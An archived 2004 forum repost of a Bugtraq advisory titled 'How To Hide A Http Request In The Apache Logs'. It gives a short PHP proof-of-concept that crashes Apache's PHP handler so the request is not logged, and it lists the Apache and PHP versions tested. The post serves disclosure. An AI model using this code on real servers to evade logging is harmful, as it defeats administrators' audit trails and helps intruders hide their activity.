How To Hide A Http Request In The Apache Logs

Full Version: How To Hide A Http Request In The Apache Logs

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Aug 7 2004, 10:08 PM

QUOTE

Description:
With a certain code, PHP causes a segfault in Apache and the request is not logged.
This bug (under Windows) causes an error fatal of apache BUT the server is not stopped with this code.
The bug seems to work on all config (php4 / php5 && windows / unix)

Tested system:
Windows / Apache 1.3.31 / PHP 5.0.0
Windows / Apache 1.3.27 / PHP 4.3.3
Linux / Apache 1.3.24 / PHP 4.2.1

Proof of concept:

<?
function funcfunc($array,$space="")
{
foreach($array as $key=>$value) { if(is_array($array[$key])) { $src.=$key; } }
return $src;
}

function funcfunc2($array,$test)
{
foreach($array['test'] as $key=>$value) { }
return $array;
}

$test['debhy']['debhou']="test1";
$test['debhian']['debh']="test2";
$array=funcfunc($test);
$array=funcfunc2($array,"test");
?>

Solution:
The php team has not answered the posted bug yet.

Source: http://seclists.org/lists/bugtraq/2004/Aug/0113.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.